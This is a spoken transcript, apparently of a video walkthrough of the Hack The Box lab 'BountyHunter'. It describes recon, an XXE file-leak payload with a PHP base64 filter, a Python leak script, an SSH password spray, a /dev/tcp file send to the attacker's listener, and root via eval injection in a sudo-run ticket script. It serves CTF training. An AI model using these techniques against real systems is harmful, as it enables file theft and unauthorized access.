What's going on YouTube? This is Ipsec. I'm doing BountyHunter from HackTheBox, which I really like this box because the foothold is easy but did involve chaining together a few pieces of recon in order to weaponize it. The actual exploit is an XML Entity Injection, which can leak files on a server, and if you convert the files to base64 using a PHP filter, you can actually leak PHP source code. The reason why you have to use the PHP filter to convert it is because the greater than and less than sign is bad characters in XML Entity Injection, so the base64 avoids those bad characters. With the ability to leak any file on the box, you leak the Etsy passwd file to get a list of users, and then you find db.php through gobustering the box, and that file has a password. You combine the password with a list of users, perform a password spray via SSH, and get a shell on the box. And then the root involves reading a Python script that parses help desk tickets, and if you format the ticket correctly, you can hit a eval function to get code execution as root. With that being said, let's jump in. As always, we're going to start off with an nmap, but the one small different thing I'm going to do is a -p- to scan all ports because I haven't really done this yet and I want all the ports and I want them pretty quickly. And then we'll do --min rate and set it to 10,000. This can be 10,000 packets per second. And then OA, output all formats, put it in the nmap folder, so make dir nmap. And we'll call this all ports and the IP address, which is 10.10.11.100. And the last thing I'm going to do is -v, so it shows me open ports as it finds it. And we can see 2 ports are open right now. I'm going to start my second nmap script with -sc for default scripts, sv, enumerate versions, oa, output all formats, put it in the nmap directory and call it BountyHunter. And then the IP address of 10.10.11.100. And since I know the only ports open are 22 and 80, those are the 2 ports I'm going to run it against. And this one only took about like 7.5 seconds. These 2 ports, I bet this has been more than 7 seconds already because script scans take a while, so that was actually relatively fast for a script scan even on 2 ports, coming back in 11 seconds. But if you want quick results, don't use scripts and then just do script scan on what is open. We do see SSH is open on port 22, and its banner tells us it's an Ubuntu server, and then we have HTTP open on port 80, and its banner tells us it's Apache, also running on Ubuntu. We have the HTTP title called Bounty Hunters. So let's go take a look at the website. So 10.10.100, or 10.10.11.100, and we have just a page, Bounty Hunters, the B team. I'm guessing the B means Bounty Hunters. We have a pricing guide. If we click it, it goes nowhere. This contact form, let's do ipsec, root at ipsec.rocks. And then I always like doing like an image source is equal to something. So this will be 10.10.14.8 would be me. /image. I think that should be enough. Maybe I can specify http://. We'll do port 8000 and NC LVNP 8000. And the last thing I want to do is stand up burp suite. And before I do that, I have some doubts, so make dir /dub. Let's just v index.html, paste this in, and then python 3-m http server 80. Even the simplest syntax I still screw up from time to time, so I'm just testing it. I go to 127.0.0.1. Let's turn intercept off real quick, and I do get a connection back, so my image header does work. If someone goes to that page, they will get redirected. So let's go back here to this image or this contact form and submit it. And that was pretty much a waste because it's not submitting any data whatsoever. So we can just move on. I'd expect this to be a post request and our contact form would be below, but it's not. So let's just move on. And before we keep testing this website, let's do some recon in the background because every second we're not running something, we're just wasting. So let's do gobuster dir -w opt seclist discovery web content raft small words.txt -extension. What type of server is this? Let's test index.html, not found. Index.php, looks like it is PHP. Let's see, what else do we need? We have word list, extension, out file. We can call this gobuster.out. And then good old URL. So HTTP 10.10.11.100. It's going to take me a while to get used to not saying 10.10.10, but we've ran out of IPs on that subnet. So gobuster is running. Let's take a look at this page. We have the contact. If we go over to portal, it says portal under development. I'm just going to examine the source to make sure nothing is hidden there. If we looked at the source here, I don't see WordPress or anything, so this is looking like a static site. But we go over to where the portal is, and we have a basic form. So exploit title, let's do please subscribe. CWE, I'm going to do 9001. CVSS score, let's do a 10. And bounty reward, let's do lead, and just see what happens. If the DB was ready, this would have been added. So let's examine this request. If I go to Burp Suite, I can go to my history, and we have the post request right here. We can send it to the repeater. And that's just there because my proxy is currently not intercepting, but everything does go to the history. So we have this repeater tab. I'm going to highlight this. And we can see Burp Suite already decoded the base 64, and we have XML. So whenever I see XML, I like trying XML Entity Injection. So what I'm going to do is just Google payload all the things, XXE. And we go to this page. Payload all the things is a great GitHub repo that just has tons and tons of attacks. So looking at this, we have a quick detection. This isn't including any files, and I do like doing this first because it's not actually malicious. I always am in favor of keeping it as simple as possible. If this was like a BSD box, we know it's not because the nmap header told us it was Ubuntu, but like etc passwd may not exist. I think maybe that file does exist on BSD. But if for some reason we can't read this file, maybe the web application is in some type of jail, meaning it can't go out over www HTML, this LFI request would fail and we may move on thinking it's not vulnerable. So I do like starting with a super simple payload that's not weaponized in the least. So let's go and edit this. So we say doc type replace and then entity example do. And in here, we're defining entity to be the variable example and its result will be do. So if in here I do and example semicolon, now it's going to put that variable in this title. So I'm going to apply changes, send the request, and we don't have the example, we have do, so we have confirmed this is XML Entity Injectable. So the next thing I do now is making my exploit more and more dangerous. So let's try including a file. So I'm going to grab this. Let's edit our doc type. Now it's going to be entity test, no longer entity example. So we change that variable and it's including etc passwd. So we send this and boom, we have the passwd file. So we know there is LFI. Now the bad thing with this example right now is we can't actually include PHP files because I think the file when you're doing XML Entity Injection has to be compatible. Like there's a lot of bad characters because if it's invalid XML, it just breaks. So PHP involves, or HTML in general, has all these like brackets, which I think breaks it. At the end of the video, I'll go and verify that. But I think it's all the brackets that are involved in the payload that do break it. So if I try including this file, it fails. Additionally, if we got rid of this slash, because this file : / I think this is called the protocol wrapper. I'm not exactly sure what it's called, but it's always 2 slashes. That third slash is putting us into the root directory. That would be just slash. So I got rid of that third slash, so we're now in the current working directory of the web application, which is generally where the index file is. So that's why I did it with the 2 slashes. And this still fails. But this is PHP, and if we keep going down this payload all the things repo, there is a way to use the, I forget what this is called. the PHP filter to convert output into base64. So we can copy this and then go back to our payload, highlight this, and doc type, change this. So now our entity is defined as XXE, so we put that there. And the resource is just index.php. So let's apply this change, go, and boom, we have a bunch of base64. And what I'm going to do, copy this, and let's go here, echo-n, paste that. Oh my god, that is ugly. Base64-d, and it looks like we have the PHP source code, which is quite big. Let's see. Oh, we have index.php source code. There is no PHP because this is a static site, but now we can actually include files. So from here, we could keep playing around in Burp Suite, but that is a very cumbersome process, and it doesn't take us more than 5-10 minutes to create this in Python, which would let us get files much more quickly. So that's what I'm going to do. So let's go and create, we'll call this XXE.py. And right off the bat, we know we're going to need the request module because we're making HTTP request. So I'm going to do request.post, and then we copy this page. We can do HTTP 10.10.11.100, and then paste that URL. And we need to actually send the post data. So I'm going to do data equals data, and we'll define data now. So we'll do data is equal to, and it's a dictionary as in value, then colon, or variable colon actual value. So we'll do data, and then just paste in the static value we have. And eventually we will move towards making this piece dynamic. But I always like getting a super proof of concept very quickly. So this will be r is equal, and then we should be able to just print r.text. So if I execute XXE, it did not work. So we have some issue somewhere. I'm going to guess it's because this is URL encoded. So %3d is equals, and then we have a %2b right there, and I think that's a plus. If you didn't know, you could just go to Burp Suite decoder and then do equals and plus, and then we encode this as, or the better way would be, or is it? I actually don't remember the variables, but you could just put %2d and then decode. But if we do that and then encode as URL, we have those values, and we could have done it the other way around. Decode as, where's URL? Oh, there it is. For some reason, those colors messed with me, but yep. Let's try pasting this in where they're not already encoded, and boom, we have it. So here we could write, we could use beautiful soup and go through it, or write some custom regular expression to get to this exact part. What I'm actually going to do is a ugly hack. I'm just going to use split. So I'm going to split on this character. 1, 2, 3, 4. So I think this will be 5. So let's go back here. Let's do output is equal to r.text dot split, like that. And I always like just doing that. And we'll do 5. Output. Run this. And we almost have it. We just need to trim 1, 2, 3, 4 characters. So what I'm going to do is a, forget what they call this, string jitsu or something weird. But I'm going to do -4:, and I think that's going to chop the last 4 characters off. Actually, it did the opposite. It just grabbed the last 4 characters. So let's put that colon on the other side. And boom, we just have a base64 string. So we know what to do with that. Import base64, and then we can print output, but we need to decode it. So base64.b64 decode output, and we have a string. Now the base64 library puts everything in a byte. So if we just decode that, it'll look much more pretty. So if I do .decode right there, boom. So now we have the exploit working, but still modifying it's going to be a pain. So we need to break this piece out. So the best way to do that is let's base64 decode this. So echo-n base64-d and copy this. Go back here and we can say, let's see, payload is equal to, I'm going to do triple quotes, and what triple quotes does is makes it so I don't have to escape any characters. It'll only be terminated by another triple quote, which is just a weird bad character to have to bypass, so it's super safe. I'm going to put this in a format string, and what that's going to do is allow me to include variables by just putting them in brackets. And create the variable fname, and as long as I do fname is equal to index.php, actually we've already included that. Let's try XXE passwd. So now when I run this, actually we have to do one more thing. It would fail. So if I do Python 3 XXE, we don't get anything really. The thing I forgot is we have to, oh, we got it because we still have a static stuff here, but we need to base64 encode this now. So let's do payload b64 is equal to base64.b64 encode payload, and this has to be a byte string, so I'm just going to do encode there. And we will decode this to get rid of the byte thing. It's just a weird thing when working in Python 3 is always knowing when it's a byte and when it's a string and what to do, but that comes with experience. And now we include payload b64. So if I run this, success, we have just the passwd file. So we could do two things with this. I'm going to show you both. We can import sys, and then fname we could say is equal to sys.argv1, and that's going to get the very first parameter. So now if I ran this, it fails out, but if I include XXE passwd, we get the file, index.php, we get it, but I'm a sucker for like command line interfaces, so I'm going to cp xxe to be XXE args.py, and let's edit this one step further. I'm going to import cmd. I'm going to say class, actually, let's do it at the right here. Class XXE leak cmd.cmd, I think that's how. Prompt is equal to that, which is just going to be the prompt on every new line. And then def default self args. I need to put a colon there, and we'll say get file args. And may want to print this. Okay. And then I want to say XXE leak.cmd loop. That's how we call it. And what I'm going to do here, capital V to put this in visual mode, indent everything. And then we can do def get file fname, comment this one out. And for this, let's see, I just need to return instead of print. Like that. Let's see if this works. Probably does not. I probably screwed something up. Python 3 XXE e.py, cmd loop missing one functional argument. Let's do Python 3 cmd example. May want to include like cmd loop, but maybe not. Cmd. Okay, so let's see. Class turtle shell. So I called this cmd or XXE leak. Lowercase, uppercase. That is right. Oh, I need parentheses there. So when writing code, almost everyone resorts to Google or Stack Overflow. So let's try this. Boom. Etsy passwd, index.php, and we have a pretty good exploit. So now we can just explore files. So the files of interest to me is this log submit page. So let's grab this, put that there, and we can look at it. It's getting to JavaScript files. I'm looking for like PHP require to include other files that I don't know about. The other weird one was we have a tracker dir proof. So if I include this one, let's see what this looks like. Here's the XXE. We don't really have anything. We could go back to our gobuster. So I'm going to less gobuster.out. I really don't want those 403. Let's try filtering those out. So grep-v 403 gobuster.out. And we have a db.php and also portal.php. These two are definitely interesting. So db.php, and we get credentials for the database, admin and this. So what I'm going to do, v creds.text, admin that, and then portal.php is the other page, and it just says under development. So we have a potential password. SSH is also exposed. So what I'm going to do is grab this passwd file, v passwd, whoops, paste it, cat passwd, and I want everything that ends in sh. So I think I just do sh $. And we have two accounts, so root and development. We could just test the password out with each of these, but I always like doing password spraying, so let's try CrackMapExec. So we'll do CrackMapExec SSH 10.10.100 10.10.11.100 -u users.text-p, put the password in, and of course we have to create users.text. So we're going to do root and development. Run this. And we're going to try to SSH with these credentials to both accounts. Root has an authentication fail, but development succeeds. So we can SSH development at 10.10.11.100 and paste in the password. And we get onto the box. There is a contract.txt. Don't really want to read that whole thing, but we can also do like a sudo -l, which is always good, especially when you have a password, because if it asks you for the password, you know it. And it's calling Python 3.8 on this ticket validator file. So let's take a look at this. So let's see. We are load file. If location ends with .md, return, open. So I'm guessing we have to load files with md, but let's go to the main function. So file name is equal to input, and the sudo thing did force us to use Python 3.8. If we could use Python 2, we could just do an exploit here because input is vulnerable to a code execution thing. I forget exactly what type of vulnerability class it is, but I'm sure if you went to ipsec.rocks and we type, let's input Python, I thought I would have it there. I'm not exactly sure what box has had that, if any, but I know there is something there. If I find it after this video, I'll make sure it's indexed on ipsec.rocks. But that is a attack path. If it was Python 2, it's Python 3, so we can ignore that. Then we have ticket load file. So that load file is this, and it's only going to load the file if it ends in .md. So we should probably start taking notes here. Exit this or Control C. We can exit this pane. I like doing notes sideways or a vertical split like that. There we go. V notes. So we need end with .md. Okay. So the next thing is we have evaluate ticket. So let's look at what evaluate does. Code length was none. Enumerate. What is enumerate? Looks like it's a Python function. So we read lines. If the beginning does not start with Skytrain Inc., so starts with Skytrain Inc., return false. And then the next line should start with ticket 2. So ticket 2. And I think the key thing here to remember is we always need a space after 2. And then let's see, what is X? Maybe the next line starts with ticket code. So next thing, ticket code, like that. Code line starts with $, and it's going to replace that with nothing. And then int ticket code. So this is a modular statement. %7. So modulo 7 equals 4. This is getting really weird. And eventually we call eval. So I think this may get us started. We may want to run this and debug it because this may be a hard thing just to do correct the very first time around, but we'll try it. So let's save and exit my notes. And I'm actually going to just copy notes into inject.md. And we will edit inject.md to be the ticket. So we can get rid of that line. It starts with this, ticket 2, ticket code. And then modulo 7 needs to equal 4, so that'd be 11. That's essentially division with the remainder. So 11 divided by 7. 7 goes into 11 one time, obviously. And there's a remainder of 4, so that would satisfy that. And then it evals, so I'm going to do a print, please subscribe. And I'm going to get rid of the space just in case space is a bad character. I remember there was some replaces. So let's try catting inject.md, and we'll copy it over to the VM. So let's see. Do we have to call anything? Ticket validator.py? Nope. So I'll call it inject.md, paste, and sudo-l, and let's try this. So sudo run inject.md, and invalid literal for int with base 10. Not exactly sure what that is. So let's try, do I have code installed, a VSCode? Let's see. Code, Codium, sweet, I do have Codium. Is it actually going to run Python for me? And this looks like I had Jarmus up. Maybe this is Jarmus. I don't know, but let's do file new. And we should copy that. Hopefully there's nothing sensitive here. This doesn't look sensitive, so I don't have to worry about filtering anything. Jarmus was a video I did previously. If you go to my channel, you can see it. but should have done that. Okay, that works fine. Okay. So we need to get that file over to us. So cat, we can send this to dev tcp 1010.14.8 9001 and nclvnp 9001 to ticket validator.py. Boom, we sent it. We can cat it, and then xclip selection. I think primary would be good. Paste. Nope. Clipboard. There we go. And that's in UHC. So let's do IPsec HTB. This box is BountyHunter. Yeah, ticket validator.py. I probably could just open the ticket instead of copy and pasting. It's been a long day. So if I F5 to run this, is it going to run in Python? Sweet, it does. So the path, we have inject.md. So the great thing about this is I can just click and set breakpoints. So inject.md, and we broke here. So we can step into this and see where it goes. And we can always see variables. So if x does not start with, so I'm just going to continue, break there. We can look at what x is equal to. So we can see does indeed start there. Let's go to the next one. X starts with this ticket 2. That looks correct. Ticket code. It's probably erroring somewhere down here. So that's what I'm going to jump to. Let's see. Here we go. So it's doing int ticket code. So what is ticket code currently? Debug console. We can just do that. And it is this whole thing. Oh, we need a plus. It's splitting on plus, and in my mind, plus was space. So that is one of the errors, maybe the only error. I'm not exactly positive, but let's try putting a plus there. Okay. We can disable these breakpoints. So we only break at the point we want. F5 again to run it. Inject.md. Okay, let's see what ticket code now is. It is just 11. So we have passed that one. And now we're doing an eval, and it's replacing star with that. So if I do X, we have that, and it's doing this eval. So I could just copy and paste it in this debug window. And we have an error. My guess is we're doing 11 plus print. So I wonder if we do, let's see, maybe 11 plus semicolon print, because that will break the Python. So int 11, if we did like that, this breaks, right? Yes. So let's see if we did the, let's try that, what I said before. Let's see, int 11 plus semicolon like that. And then we will rerun this. Inject.md. So the ticket code, because we did 11 and then the plus, the ticket code is still 11. So that is good. And now we're going in here, and the eval statement now will be 11 plus semicolon the eval. So maybe that will work. Oh, we just continue. Didn't error? I stand corrected. It did error. But one of the previous attempts, we did have it working because we have echoing please subscribe here. But we should be able to get this to work without the error. We don't have to because we had code execution, but it's always nice when the program doesn't crash afterwards. Looking at this, if I go to the debug console, can I still print X? Yeah, so this is what we're trying to execute. Let's take the eval statement out of it. So we just print. So we're trying to execute 11 plus semicolon print, please subscribe. The error message is coming from this 11 plus statement. I bet if we do 11 plus 1, so it's valid Python, it'll now work. Because if I just execute 11, that's valid. If I do 11 plus, we have a syntax error, but 11 plus 1 gets me to 12. So let's try this. We can stop that, go over here, inject, and say 11 plus 1, save it, and then go over here, run the Python file, and we'll call inject.md. I typoed that. Let's run it again. Enter name. Oh my god. Inject.md. Okay, so now we're here. If I go down, we can copy this X replace code again. Debug console. And that looks like it is valid. So I'm going to step over this. If we go back to the terminal, I don't see it saying please subscribe. And what do we still have an error with? Eval main invalid syntax. This should be valid, right? 11 plus 1. Let's see. Actually, I'm just going to go in here, Python 3. That works. Let's see, eval, like that. Eval does not like the semicolon. Let's see, do we do like a plus semicolon? Well, that one worked, but it still crashes. However, I think I am happy with the crash. So it's just 11 plus print, and that works. I think that's what we had before when I said something worked and errored. But I'm starting to think at this point, we probably won't be able to fix that error message easily. So let's just try doing a code execution point. So I'm going to import OS, and then we will call system ID and see if this prints out our username. It does. So we have a code execution path with this. Let's put this back into our exploit and try it out. So Control D, let's go vi inject.md, and we just do 11 plus eval, which is silly, but it does work. So let's go here, pass a ticket file, inject.md. I'm going to restart this. So run this, inject.md. There we go. We hit the breakpoint. Go a few times, and we do have it outputting. So now we just have to put a reverse shell in here. So actually, we don't. We can probably just do bash, because this should get us a interactive prompt, because we're running it with sudo. The reason why I don't want to do a reverse shell is just because of all the potential bad characters. So let's just try running this on the target. Where is it? Which pane? There it is. So v inject.md. We are so close with this example. We just needed a plus, I think. What is the actual one? Yeah. When all we missed was a plus and... Why do I have that eval there? I don't... let's see. We can get rid of this. I want to say this is all we need. We'll try this. So was that sudo command? Okay, inject.md. And we are now root. So that is the box, but I did want to test one thing when it came to that XXE. I just want to test if it's like bad characters that are breaking it, why we have to do the base 64 thing. So let's take a step back and go var dub HTML v output, and we'll just say please subscribe, save it, go back to Burp Suite, and we want to go back to a payload before we are doing this PHP filter convert. So I press Ctrl-Z a few times. Let's see where we are here. This is doing file index.php, which is good. So let's just move output to test.html. Okay, so if I just include test.html, apply change, send it. It did not like that. Why did you not like that? Let's see, entity test. ls. It is world readable. I think that should have worked. Let's see, cp etc passwd to test.html. If we resend this, so we have a error somewhere. It's not clear to me exactly where this error is yet. So I'm going to try including etc passwd. It includes that file. So let's try var dub html test.html. Okay, so v test.html. I guess it just doesn't like the non-absolute path with the file command, which is weird to me. But we have please subscribe. So now we can try putting it in brackets like that, send, and it errors. So we just have one bracket, still crashes. If it's like that, it works. But this opening bracket seems to be what is breaking the XXE. So that's why we can't include any like PHP source or HTML, is because of that one bad character. But that bad character was worked around with the PHP filter to convert it to base 64, where that character does not exist. So that's a good way to get around bad characters when you're doing an LFI with XXE. Yeah, so that will be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.